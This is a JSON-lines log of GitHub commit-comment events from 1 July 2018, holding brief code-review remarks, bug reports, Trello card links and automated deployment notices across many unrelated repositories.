{"id":"7903170338","type":"CommitCommentEvent","actor":{"login":"DevonFulcher"},"repo":{"name":"schrum2/MM-NEAT"},"payload":{"comment":{"id":29558269,"position":31,"line":114,"path":"src/main/java/edu/southwestern/networks/hyperneat/architecture/CascadeNetworks.java","commit_id":"575c005acb6ccb3d87d1fddb41b9e4761f0813a2","created_at":"2018-07-01T14:59:54Z","updated_at":"2018-07-01T14:59:54Z","author_association":"COLLABORATOR","body":"@schrum2 It is wrong to return null it should return the unaltered population. I don't think throwing an exception is appropriate. This method will be called every 50 generations by default when cascade expansion is turned on. If this threw an exception, the maximum number of generations in a run would be limited by the receptive field, substrate height, and substrate width. I could alter the code where this is being called so that it is only called if a cascade expansion can occur. That would require changing the method signature in order to avoid duplication of code."}},"created_at":"2018-07-01T14:59:54Z"}
{"id":"7903172591","type":"CommitCommentEvent","actor":{"login":"vickyiii"},"repo":{"name":"xupsh/pp4fpgas-cn"},"payload":{"comment":{"id":29558278,"position":87,"line":85,"path":"06-Sparse-Matrix-Vector-Multiplication.md","commit_id":"8b3a48e9db51a01b7af7ee1b9a642c49775e5078","created_at":"2018-07-01T15:01:10Z","updated_at":"2018-07-01T15:01:10Z","author_association":"COLLABORATOR","body":"**matrixvector**函数输出结果不相同是时"}},"created_at":"2018-07-01T15:01:10Z"}
{"id":"7903175852","type":"CommitCommentEvent","actor":{"login":"healingbrew"},"repo":{"name":"overtools/OWLib"},"payload":{"comment":{"id":29558297,"position":5,"line":14,"path":"TankLib/Agent/ProductDatabase.cs","commit_id":"d60a7073be4bd28bcd7dacafb8ecce7e324ada66","created_at":"2018-07-01T15:03:11Z","updated_at":"2018-07-01T15:03:11Z","author_association":"MEMBER","body":"These changes are purely for Powershell interoperability. "}},"created_at":"2018-07-01T15:03:11Z"}
{"id":"7903176684","type":"CommitCommentEvent","actor":{"login":"MohammadALHamalawy"},"repo":{"name":"Yenthe666/auto_backup"},"payload":{"comment":{"id":29558299,"position":null,"line":null,"path":null,"commit_id":"23e809b2e7bc2eff72550cd3cb26489774f32253","created_at":"2018-07-01T15:03:45Z","updated_at":"2018-07-01T15:03:45Z","author_association":"NONE","body":"thanks very much"}},"created_at":"2018-07-01T15:03:45Z"}
{"id":"7903177103","type":"CommitCommentEvent","actor":{"login":"aykevl"},"repo":{"name":"karpenoktem/kninfra"},"payload":{"comment":{"id":29558301,"position":16,"line":49,"path":"kn/utils/whim.py","commit_id":"58745c31680aaba4d970f7a15808381467eb1d09","created_at":"2018-07-01T15:04:00Z","updated_at":"2018-07-01T15:04:00Z","author_association":"CONTRIBUTOR","body":"Ik heb nu een hogere timeout ingesteld (5 minuten). Dat is een stuk langer, hopelijk genoeg voor giedo-sync, maar niet oneindig lang.\r\nOverigens moet 0e53bfde122b43299cd2e0dbf19ba300f112ac62 een andere kant van het probleem oplossen.\r\nUiteindelijk zou ik graag zien dat exceptions op de een of andere manier doorgestuurd worden, zodat die timeout helemaal niet meer zo nodig is. Ik ben er alleen nog niet helemaal over uit wat daarvoor de beste manier is."}},"created_at":"2018-07-01T15:04:00Z"}
{"id":"7903177189","type":"CommitCommentEvent","actor":{"login":"justinforlenza"},"repo":{"name":"justinforlenza/stottey"},"payload":{"comment":{"id":29558302,"position":null,"line":null,"path":null,"commit_id":"4d8c054a858a5a31e8103bc060dabf7f30f2e53a","created_at":"2018-07-01T15:04:04Z","updated_at":"2018-07-01T15:04:04Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [API Authentication with JWT](https://trello.com/c/5h1EHMyi/3-api-authentication-with-jwt)"}},"created_at":"2018-07-01T15:04:04Z"}
{"id":"7903177680","type":"CommitCommentEvent","actor":{"login":"elad335"},"repo":{"name":"RPCS3/rpcs3"},"payload":{"comment":{"id":29558303,"position":31,"line":30,"path":"rpcs3/Emu/Cell/lv2/sys_tty.cpp","commit_id":"e652d4407cfee41dcda24b4a3c4a9623c0a71b26","created_at":"2018-07-01T15:04:25Z","updated_at":"2018-07-01T15:04:25Z","author_association":"CONTRIBUTOR","body":"this check should be the first in this  function, since you cant get EINVAL on retail consoles, regardless of the params."}},"created_at":"2018-07-01T15:04:25Z"}
{"id":"7903177688","type":"CommitCommentEvent","actor":{"login":"mattvw"},"repo":{"name":"Aris-t2/CustomCSSforFx"},"payload":{"comment":{"id":29558304,"position":null,"line":null,"path":null,"commit_id":"6086c3be3933840f39fc44a25b67d0a0f1e04ce1","created_at":"2018-07-01T15:04:25Z","updated_at":"2018-07-01T15:04:25Z","author_association":"NONE","body":"Why was changing the color of the tab background and text of unread tabs removed with this commit? Did support for changing that tab type go away? I really hope not... Or did the tab type just change names? I really liked being able to change the color of the unread tab text..."}},"created_at":"2018-07-01T15:04:25Z"}
{"id":"7903177943","type":"CommitCommentEvent","actor":{"login":"ZephyrVic"},"repo":{"name":"ZephyrVic/QUIZ-APP"},"payload":{"comment":{"id":29558306,"position":null,"line":null,"path":null,"commit_id":"e7c8f291ee40428b7e9bb45d992e3dfe18a7fda1","created_at":"2018-07-01T15:04:35Z","updated_at":"2018-07-01T15:04:35Z","author_association":"OWNER","body":"This repository is for the files for android basic quiz.\r\n\r\nIt is a Q & A app with 10 questions and scores for each question."}},"created_at":"2018-07-01T15:04:35Z"}
{"id":"7903179043","type":"CommitCommentEvent","actor":{"login":"justinforlenza"},"repo":{"name":"justinforlenza/stottey"},"payload":{"comment":{"id":29558309,"position":null,"line":null,"path":null,"commit_id":"5c2c5792e9265a3a4edca9a8cf8ddf208e5a5b56","created_at":"2018-07-01T15:05:17Z","updated_at":"2018-07-01T15:05:17Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [User API](https://trello.com/c/u3i53LYP/10-user-api)"}},"created_at":"2018-07-01T15:05:17Z"}
{"id":"7903179222","type":"CommitCommentEvent","actor":{"login":"justinforlenza"},"repo":{"name":"justinforlenza/stottey"},"payload":{"comment":{"id":29558310,"position":null,"line":null,"path":null,"commit_id":"cf394a8d5c2e87692f1b644fff413d785a3c5fc2","created_at":"2018-07-01T15:05:26Z","updated_at":"2018-07-01T15:05:26Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [User API](https://trello.com/c/u3i53LYP/10-user-api)"}},"created_at":"2018-07-01T15:05:26Z"}
{"id":"7903179532","type":"CommitCommentEvent","actor":{"login":"justinforlenza"},"repo":{"name":"justinforlenza/stottey"},"payload":{"comment":{"id":29558311,"position":null,"line":null,"path":null,"commit_id":"4a56adba5602a849952d903b2859cd28b03ebbe6","created_at":"2018-07-01T15:05:39Z","updated_at":"2018-07-01T15:05:39Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [User API](https://trello.com/c/u3i53LYP/10-user-api)"}},"created_at":"2018-07-01T15:05:39Z"}
{"id":"7903179889","type":"CommitCommentEvent","actor":{"login":"silver-paladin"},"repo":{"name":"stenzek/dolphin"},"payload":{"comment":{"id":29558313,"position":null,"line":null,"path":null,"commit_id":"97df5f68cd78b9b48512084b8636a534dcb4a975","created_at":"2018-07-01T15:05:55Z","updated_at":"2018-07-01T15:05:55Z","author_association":"NONE","body":"Finding this error when I try to run any rom with Vulkan. `[***MoltenVK ERROR***] VK_ERROR_INITIALIZATION_FAILED: Render pipeline compile failed (error code 1):\r\nFragment shader does not write to render target color(0), index(1) that is required for blending.`"}},"created_at":"2018-07-01T15:05:55Z"}
{"id":"7903179931","type":"CommitCommentEvent","actor":{"login":"Sbosh11"},"repo":{"name":"Sbosh11/moola"},"payload":{"comment":{"id":29558314,"position":null,"line":null,"path":null,"commit_id":"c412719780fdc555bda9b5a95712e2483289c63b","created_at":"2018-07-01T15:05:56Z","updated_at":"2018-07-01T15:05:56Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-01T15:05:56Z"}
{"id":"7903180049","type":"CommitCommentEvent","actor":{"login":"justinforlenza"},"repo":{"name":"justinforlenza/stottey"},"payload":{"comment":{"id":29558315,"position":null,"line":null,"path":null,"commit_id":"4d14c64ae529529060d7d267795781438aa04422","created_at":"2018-07-01T15:06:01Z","updated_at":"2018-07-01T15:06:01Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Core Models](https://trello.com/c/mgcy4lXM/5-core-models)"}},"created_at":"2018-07-01T15:06:01Z"}
{"id":"7903180843","type":"CommitCommentEvent","actor":{"login":"justinforlenza"},"repo":{"name":"justinforlenza/stottey"},"payload":{"comment":{"id":29558316,"position":null,"line":null,"path":null,"commit_id":"75a9a1aa4fdf033cf3bd782cbe0adb21bd7fb55d","created_at":"2018-07-01T15:06:30Z","updated_at":"2018-07-01T15:06:30Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Support Ticket Models](https://trello.com/c/viVQTFpK/4-support-ticket-models)"}},"created_at":"2018-07-01T15:06:30Z"}
{"id":"7903181194","type":"CommitCommentEvent","actor":{"login":"justinforlenza"},"repo":{"name":"justinforlenza/stottey"},"payload":{"comment":{"id":29558318,"position":null,"line":null,"path":null,"commit_id":"619efbf6fb037d44a1a4461f3d179a8106f038a2","created_at":"2018-07-01T15:06:44Z","updated_at":"2018-07-01T15:06:44Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Category API](https://trello.com/c/K8koIdNM/7-category-api)"}},"created_at":"2018-07-01T15:06:44Z"}
{"id":"7903182050","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/beakerx-feedstock"},"payload":{"comment":{"id":29558322,"position":null,"line":null,"path":null,"commit_id":"a9ef21b56db413ec785f2b5bc3d682ddb88f6334","created_at":"2018-07-01T15:07:18Z","updated_at":"2018-07-01T15:07:18Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @leetz were added to conda-forge. Welcome to conda-forge!\"\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @leetz were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-01T15:07:18Z"}
{"id":"7903183587","type":"CommitCommentEvent","actor":{"login":"btaro001234567"},"repo":{"name":"CryptoAppsDev/BitcoinWallet"},"payload":{"comment":{"id":29558327,"position":null,"line":null,"path":null,"commit_id":"e2b74d50afc82b594d44c3b821ec449c9c4a5771","created_at":"2018-07-01T15:08:23Z","updated_at":"2018-07-01T15:08:23Z","author_association":"NONE","body":"??"}},"created_at":"2018-07-01T15:08:23Z"}
{"id":"7903185017","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29558330,"position":22,"line":4604,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"309b97960716bb470fb081b2532166a8b2fb671d","created_at":"2018-07-01T15:09:19Z","updated_at":"2018-07-01T15:09:19Z","author_association":"COLLABORATOR","body":"Why is _ol_ `tv` here?"}},"created_at":"2018-07-01T15:09:19Z"}
{"id":"7903185082","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":29558331,"position":null,"line":null,"path":null,"commit_id":"aa80c7d4acb6177f04fb06eaeb1dd35ba7b9b975","created_at":"2018-07-01T15:09:22Z","updated_at":"2018-07-01T15:09:22Z","author_association":"COLLABORATOR","body":"Also see [Issue 677](https://github.com/weidai11/cryptopp/issues/677)."}},"created_at":"2018-07-01T15:09:22Z"}
{"id":"7903185570","type":"CommitCommentEvent","actor":{"login":"SOUIDENE"},"repo":{"name":"zzali/NDSDN"},"payload":{"comment":{"id":29558333,"position":null,"line":null,"path":null,"commit_id":"8c22537226f5812680d53df492e6fac1b3573901","created_at":"2018-07-01T15:09:45Z","updated_at":"2018-07-01T15:09:45Z","author_association":"NONE","body":"I tried to test this work but i found difficulties \r\n\r\n~/..../NDSDN-master$ sudo mn --custom topology.py --controller=remote,port=9999 --switch=ovsk,protocols=OpenFlow14 --topo mytopo --mac --arp\r\n.......\r\n*** Adding controller\r\nUnable to contact the remote controller at 127.0.0.1:9999\r\n............\r\n*** Adding links:\r\n--------------------------------------------------------------------------------\r\nCaught exception. Cleaning up...\r\nTypeError: __init__() got an unexpected keyword argument 'delay'\r\n--------------------------------------------------------------------------------\r\n\r\nDespite  \"from mininet.link import TCLink \" exists...\r\n\r\nAnyone has an idea?\r\n\r\n\r\n \r\n\r\n"}},"created_at":"2018-07-01T15:09:45Z"}
{"id":"7903187568","type":"CommitCommentEvent","actor":{"login":"mehulshahnj"},"repo":{"name":"mehulshahnj/gc-blockchain-app"},"payload":{"comment":{"id":29558336,"position":null,"line":null,"path":null,"commit_id":"5a1fb7ced03f52dec8174c2b733344d128acd816","created_at":"2018-07-01T15:11:00Z","updated_at":"2018-07-01T15:11:00Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/3955c280-8a6e-4ed0-b7a5-6f30f95f589d?env_id=ibm%3Ayp%3Aus-south \"gc-blockchain-app\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/90d723e9-1ac3-490d-b08c-83526e6ac856?env_id=ibm%3Ayp%3Aus-south \"gc-blockchain-app\") deployed [gc-blockchain-app](https://github.com/mehulshahnj/gc-blockchain-app/releases/tag/deploy-ibm-yp-us-south-mehul-infinity-services.com-dev-20180701-151059 \"deploy-ibm-yp-us-south-mehul-infinity-services.com-dev-20180701-151059\") to [dev](https://console.bluemix.net/apps/870cfe4d-4eed-4421-bc81-dc4b5b8eb658?env_id=ibm:yp:us-south \"ibm:yp:us-south:mehul@infinity-services.com:dev\"), including this commit"}},"created_at":"2018-07-01T15:11:00Z"}
{"id":"7903187722","type":"CommitCommentEvent","actor":{"login":"rajsankar143"},"repo":{"name":"rajsankar143/webbased2-alert"},"payload":{"comment":{"id":29558337,"position":null,"line":null,"path":null,"commit_id":"023bec2a825997c58e4ebcd78ad470ee4aec9b9d","created_at":"2018-07-01T15:11:06Z","updated_at":"2018-07-01T15:11:06Z","author_association":"OWNER","body":"h"}},"created_at":"2018-07-01T15:11:06Z"}
{"id":"7903188010","type":"CommitCommentEvent","actor":{"login":"rajsankar143"},"repo":{"name":"rajsankar143/webbased2-alert"},"payload":{"comment":{"id":29558338,"position":null,"line":null,"path":null,"commit_id":"023bec2a825997c58e4ebcd78ad470ee4aec9b9d","created_at":"2018-07-01T15:11:17Z","updated_at":"2018-07-01T15:11:17Z","author_association":"OWNER","body":"mood"}},"created_at":"2018-07-01T15:11:17Z"}
{"id":"7903188051","type":"CommitCommentEvent","actor":{"login":"SOUIDENE"},"repo":{"name":"zzali/NDSDN"},"payload":{"comment":{"id":29558339,"position":null,"line":null,"path":null,"commit_id":"8c22537226f5812680d53df492e6fac1b3573901","created_at":"2018-07-01T15:11:19Z","updated_at":"2018-07-01T15:11:19Z","author_association":"NONE","body":"I tried to test this work but i found difficulties\r\n\r\n~/..../NDSDN-master$ sudo mn --custom topology.py --controller=remote,port=9999 --switch=ovsk,protocols=OpenFlow14 --topo mytopo --mac --arp\r\n.......\r\n*** Adding controller\r\nUnable to contact the remote controller at 127.0.0.1:9999\r\n............\r\n*** Adding links:\r\nCaught exception. Cleaning up...\r\nTypeError: init() got an unexpected keyword argument 'delay'\r\nDespite \"from mininet.link import TCLink \" exists...\r\n\r\nAnyone has an idea?"}},"created_at":"2018-07-01T15:11:19Z"}
{"id":"7903188742","type":"CommitCommentEvent","actor":{"login":"tofudfy"},"repo":{"name":"tofudfy/watson-chatbot"},"payload":{"comment":{"id":29558340,"position":null,"line":null,"path":null,"commit_id":"63d1c9af8c94854759504f307a20c44199a6fe15","created_at":"2018-07-01T15:11:50Z","updated_at":"2018-07-01T15:11:50Z","author_association":"OWNER","body":"Write a comment"}},"created_at":"2018-07-01T15:11:50Z"}
{"id":"7903189570","type":"CommitCommentEvent","actor":{"login":"JLShusterman"},"repo":{"name":"JLShusterman/ffxiv-teamcraft"},"payload":{"comment":{"id":29558342,"position":18,"line":18,"path":"src/assets/wiki/en/Commission_Request","commit_id":"31f483d2e9dfb7a8ffb2fc352c95d94aa7a86586","created_at":"2018-07-01T15:12:26Z","updated_at":"2018-07-01T15:12:26Z","author_association":"OWNER","body":"Forgot this:\r\n\r\n---\r\n`Written by: Raeanya (Famfrit)`"}},"created_at":"2018-07-01T15:12:26Z"}
{"id":"7903190300","type":"CommitCommentEvent","actor":{"login":"JLShusterman"},"repo":{"name":"JLShusterman/ffxiv-teamcraft"},"payload":{"comment":{"id":29558345,"position":null,"line":null,"path":null,"commit_id":"31f483d2e9dfb7a8ffb2fc352c95d94aa7a86586","created_at":"2018-07-01T15:12:54Z","updated_at":"2018-07-01T15:12:54Z","author_association":"OWNER","body":"docs: added wiki page for commission board (client)"}},"created_at":"2018-07-01T15:12:54Z"}
{"id":"7903198127","type":"CommitCommentEvent","actor":{"login":"wkitty42"},"repo":{"name":"c172p-team/c172p"},"payload":{"comment":{"id":29558364,"position":null,"line":null,"path":null,"commit_id":"3ae6a0940f6a98a48b828f77d96de939f5ddaf84","created_at":"2018-07-01T15:18:13Z","updated_at":"2018-07-01T15:18:13Z","author_association":"CONTRIBUTOR","body":"On 07/01/2018 09:57 AM, Joshua Davidson wrote:\n> Both, this is what the real attitude indicator looks like for example: \n> https://farm7.staticflickr.com/6195/6066184333_b3b1cc4a55_b.jpg\n\n\"the real attitude indicator\"?? as in there's only one that's ever been used? \ni've seen several different ones in the c172p craft i've looked at... IIRC this \none is modeled from the real life OH-CTL (c172m)...\n\n\n> Look closely at the attitude indicator, but the basic principle applies to\n> some other instruments.\n\ni'm not sure what you're trying to show us... we see a straight on view of the \ndash so there's very little reflection anyway...\n\n\nand are you sure that's a c172p? the EC-FOD seems to be registered in Spain as a \nPA36...\n\n\"Reg\",\"DateRegistered\",\"Manufacturer\",\"Type\",\"CN\",\"ICAOType\"\n[...]\n\"EC-FOD\",\"24/08/1992\",\"PIPER\",\"PA-36-300\",\"36-7.760.069\",\"PA36\"\n"}},"created_at":"2018-07-01T15:18:13Z"}
{"id":"7903201736","type":"CommitCommentEvent","actor":{"login":"it0uchpods"},"repo":{"name":"c172p-team/c172p"},"payload":{"comment":{"id":29558370,"position":null,"line":null,"path":null,"commit_id":"3ae6a0940f6a98a48b828f77d96de939f5ddaf84","created_at":"2018-07-01T15:20:19Z","updated_at":"2018-07-01T15:20:19Z","author_association":"CONTRIBUTOR","body":"Yes, that was an example picture. I've never seen an attitude indicator matching the one we have in FG anywhere on the internet (I've searched long and hard). This picture was the best one I could find with a clear image of the the attitude indicator tends to look like in the c172p. A quick search of C172P cockpit will show you tons of cockpits, all with similar indicators."}},"created_at":"2018-07-01T15:20:19Z"}
{"id":"7903203485","type":"CommitCommentEvent","actor":{"login":"doch2"},"repo":{"name":"doch2/KOI_collusion_phoneguide"},"payload":{"comment":{"id":29558374,"position":null,"line":null,"path":null,"commit_id":"25d4aeb6c730836a1b8aae0da1ee9a2747402df2","created_at":"2018-07-01T15:21:27Z","updated_at":"2018-07-01T15:21:27Z","author_association":"OWNER","body":"ㅊㅋ"}},"created_at":"2018-07-01T15:21:27Z"}
{"id":"7903203576","type":"CommitCommentEvent","actor":{"login":"laracork"},"repo":{"name":"laracork/food"},"payload":{"comment":{"id":29558375,"position":5,"line":5,"path":"app/controllers/meals_controller.rb","commit_id":"20e552e5f908f7cbf03cff7bff5feaa33bfdbd97","created_at":"2018-07-01T15:21:30Z","updated_at":"2018-07-01T15:21:30Z","author_association":"OWNER","body":"Did it send the whole repo? This was just a practice to keep fresh on MVC\nand learning how to legally download CSS files off the web.\n\nOn Sun, Jul 1, 2018, 00:48 Andrew Max <notifications@github.com> wrote:\n\n> not sure about this :)\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/laracork/food/commit/20e552e5f908f7cbf03cff7bff5feaa33bfdbd97#commitcomment-29556927>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AjKr43NLeExGh9FVr1frQNmjbcPP_nfyks5uCH68gaJpZM4U-PHj>\n> .\n>\n"}},"created_at":"2018-07-01T15:21:30Z"}
{"id":"7903214613","type":"CommitCommentEvent","actor":{"login":"Jaedon-nanohackers"},"repo":{"name":"Jaedon-nanohackers/ROR-01"},"payload":{"comment":{"id":29558408,"position":null,"line":null,"path":null,"commit_id":"4cce8d1b604604872acb3dc54c4f58c7bf77ca9d","created_at":"2018-07-01T15:29:05Z","updated_at":"2018-07-01T15:29:05Z","author_association":"OWNER","body":"@jonahb you have to go to http://localhost:3000/dungeons. Do you know why the create dungeons page requires you to refresh it before it works?"}},"created_at":"2018-07-01T15:29:05Z"}
{"id":"7903215503","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29558410,"position":null,"line":null,"path":null,"commit_id":"5c6468554d5979a86089753e2d288bee3e776016","created_at":"2018-07-01T15:29:41Z","updated_at":"2018-07-01T15:29:41Z","author_association":"CONTRIBUTOR","body":"@Sami32 Good to see you :smile: "}},"created_at":"2018-07-01T15:29:41Z"}
{"id":"7903215915","type":"CommitCommentEvent","actor":{"login":"cristinacke28"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29558413,"position":null,"line":null,"path":null,"commit_id":"ec67aeec3970024805a06e07c2b24e92121332b5","created_at":"2018-07-01T15:29:58Z","updated_at":"2018-07-01T15:29:58Z","author_association":"NONE","body":"@tibik i made an auto update script in PS, because idk\r\n@Sugisakii thanks, but i made my own"}},"created_at":"2018-07-01T15:29:58Z"}
{"id":"7903216378","type":"CommitCommentEvent","actor":{"login":"Midor"},"repo":{"name":"FelipGC/MSP_ProjectKickOff_SS188"},"payload":{"comment":{"id":29558415,"position":4,"line":61,"path":"app/src/main/java/com/example/ss18/msp/lmu/msp_projectkickoff_ss188/Connection/AbstractConnectionService.java","commit_id":"c2a58d3cd2d50fc74cb057f038a0eb14c8f08565","created_at":"2018-07-01T15:30:15Z","updated_at":"2018-07-01T15:30:15Z","author_association":"COLLABORATOR","body":"Wenn z. B. der presenter kickt, dann wird der andere ja rausgeworfen und bekommt keine Benachrichtung und die Methode wird auch nicht bei ihm ausgeführt sondern nur beim presenter. So stell ich mir das zumindest vor, wie du es erklärt hast. Und dann hat der presenter zwei mal afterDisconnect ausgeführt, da er einmal den disconnected und einmal im callback. Der, der gekickt wurde ist aber weg und bekommt scheinbar keine Nachricht mehr. D. h. bei dem wird es nie ausgeführt?\r\n"}},"created_at":"2018-07-01T15:30:15Z"}
{"id":"7903216555","type":"CommitCommentEvent","actor":{"login":"jims10d"},"repo":{"name":"jims10d/sportman-loopback"},"payload":{"comment":{"id":29558418,"position":null,"line":null,"path":null,"commit_id":"44fa69f9a8fa60ce6f614eaa15c105bf0e9117d1","created_at":"2018-07-01T15:30:21Z","updated_at":"2018-07-01T15:30:21Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/5a7e57bc-5410-437d-95a5-d427815f5ebc?env_id=ibm%3Ayp%3Aus-south \"sportman-loopback\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/db4be768-68e6-447f-9187-7d1ee9f620cc?env_id=ibm%3Ayp%3Aus-south \"sportman-loopback\") deployed [sportman-loopback](https://github.com/jims10d/sportman-loopback/releases/tag/deploy-ibm-yp-us-south-jims10d-simpleSpace-20180701-153021 \"deploy-ibm-yp-us-south-jims10d-simpleSpace-20180701-153021\") to [simpleSpace](https://console.bluemix.net/apps/12384bdb-7ac1-45d2-b63b-7d0a3532c568?env_id=ibm:yp:us-south \"ibm:yp:us-south:jims10d:simpleSpace\"), including this commit"}},"created_at":"2018-07-01T15:30:21Z"}
{"id":"7903216852","type":"CommitCommentEvent","actor":{"login":"hsnks100"},"repo":{"name":"hsnks100/nanogui-asio-example"},"payload":{"comment":{"id":29558420,"position":null,"line":null,"path":null,"commit_id":"8b46c3db4436f188854d6cdfe1f66b5c5c0a207b","created_at":"2018-07-01T15:30:33Z","updated_at":"2018-07-01T15:30:33Z","author_association":"OWNER","body":"![image](https://user-images.githubusercontent.com/3623889/42136017-1fb30374-7d8f-11e8-85c1-ab6ff97919bb.png)\r\n"}},"created_at":"2018-07-01T15:30:33Z"}
{"id":"7903217147","type":"CommitCommentEvent","actor":{"login":"Midor"},"repo":{"name":"FelipGC/MSP_ProjectKickOff_SS188"},"payload":{"comment":{"id":29558421,"position":4,"line":61,"path":"app/src/main/java/com/example/ss18/msp/lmu/msp_projectkickoff_ss188/Connection/AbstractConnectionService.java","commit_id":"c2a58d3cd2d50fc74cb057f038a0eb14c8f08565","created_at":"2018-07-01T15:30:45Z","updated_at":"2018-07-01T15:30:45Z","author_association":"COLLABORATOR","body":"Anders ergibt das gar kein Sinn, weil sonst ja JEDER den callback bekommen hätte, d.h. einer muss auch ohne callback sein."}},"created_at":"2018-07-01T15:30:45Z"}
{"id":"7903218617","type":"CommitCommentEvent","actor":{"login":"ptflp"},"repo":{"name":"artemrogov/phpunit"},"payload":{"comment":{"id":29558423,"position":null,"line":null,"path":null,"commit_id":"0aad88754625cbf8ce3526f1182be79960b2d3d5","created_at":"2018-07-01T15:31:42Z","updated_at":"2018-07-01T15:31:42Z","author_association":"NONE","body":"круто было бы readme.md увидеть по какому курсу ты учишься"}},"created_at":"2018-07-01T15:31:42Z"}
{"id":"7903219079","type":"CommitCommentEvent","actor":{"login":"vickyiii"},"repo":{"name":"xupsh/pp4fpgas-cn"},"payload":{"comment":{"id":29558425,"position":130,"line":128,"path":"06-Sparse-Matrix-Vector-Multiplication.md","commit_id":"8b3a48e9db51a01b7af7ee1b9a642c49775e5078","created_at":"2018-07-01T15:32:05Z","updated_at":"2018-07-01T15:32:05Z","author_association":"COLLABORATOR","body":"非系数矩阵乘法(**matrixvector**)"}},"created_at":"2018-07-01T15:32:05Z"}
{"id":"7903219234","type":"CommitCommentEvent","actor":{"login":"AleksejDix"},"repo":{"name":"AleksejDix/webzueri.ch"},"payload":{"comment":{"id":29558426,"position":8,"line":8,"path":"plugins/fireauth.js","commit_id":"9295ceca794507919cddc5fcbe02b36c7bafb0a8","created_at":"2018-07-01T15:32:10Z","updated_at":"2018-07-01T15:32:10Z","author_association":"OWNER","body":"when you run this you should redirect"}},"created_at":"2018-07-01T15:32:10Z"}
{"id":"7903220426","type":"CommitCommentEvent","actor":{"login":"fariouche"},"repo":{"name":"fariouche/rtl8812AU"},"payload":{"comment":{"id":29558430,"position":null,"line":null,"path":null,"commit_id":"370f83b1ceda55358bdbe9bdeaa060a96fd4345b","created_at":"2018-07-01T15:32:59Z","updated_at":"2018-07-01T15:32:59Z","author_association":"OWNER","body":"Hi,\r\nRealtek changed again too many things. I've created a branch with a preliminary merge, but some functions are missing and not easy to reconstruct. Seeing the release note from realtek, this may not the worth the effort, seeing how little the number or fixes (only Master DFS mode...) and the number of changes! They are working like pigs"}},"created_at":"2018-07-01T15:32:59Z"}
{"id":"7903221053","type":"CommitCommentEvent","actor":{"login":"jiangwanqiang"},"repo":{"name":"smileskydoge/Afanty"},"payload":{"comment":{"id":29558432,"position":null,"line":null,"path":null,"commit_id":"339953cfdb91b01a8d1fb93a0686b5d89205ca4f","created_at":"2018-07-01T15:33:27Z","updated_at":"2018-07-01T15:33:27Z","author_association":"COLLABORATOR","body":"test"}},"created_at":"2018-07-01T15:33:27Z"}
{"id":"7903221920","type":"CommitCommentEvent","actor":{"login":"saxon-s"},"repo":{"name":"thinkle/gourmet"},"payload":{"comment":{"id":29558435,"position":null,"line":null,"path":null,"commit_id":"91245de427e5f61c74048aabb863def88fce3228","created_at":"2018-07-01T15:33:59Z","updated_at":"2018-07-01T15:33:59Z","author_association":"NONE","body":"The exception added for web-based plugin has no exception clause specified. This breaks optional arguments `--help` and `--version`. These commands should exit after displaying their respective messages. The exception cause is too broad which causes the commands to launch gourmet after displaying there messages. Adding a 'ValueError' exception clause resolves the issue.\r\n```\r\n   -except:\r\n41 +except ValueError:\r\n```"}},"created_at":"2018-07-01T15:33:59Z"}
{"id":"7903223604","type":"CommitCommentEvent","actor":{"login":"aksh1618"},"repo":{"name":"chay2199/GitHeat"},"payload":{"comment":{"id":29558437,"position":5,"line":5,"path":"Week-4/client.py","commit_id":"ddbaf1e417ba4b93375725082fae86419a52c8d1","created_at":"2018-07-01T15:35:07Z","updated_at":"2018-07-01T15:35:07Z","author_association":"NONE","body":"Remove debugging statements before committing."}},"created_at":"2018-07-01T15:35:07Z"}
{"id":"7903224267","type":"CommitCommentEvent","actor":{"login":"StrahdVonZarovich"},"repo":{"name":"StrahdVonZarovich/Golang-Basic-Examples"},"payload":{"comment":{"id":29558438,"position":null,"line":null,"path":null,"commit_id":"65403176da7a287b75cf94318697ae6ce18b0dff","created_at":"2018-07-01T15:35:34Z","updated_at":"2018-07-01T15:35:34Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [jj](https://trello.com/c/Y0tzt076/1-jj)"}},"created_at":"2018-07-01T15:35:34Z"}
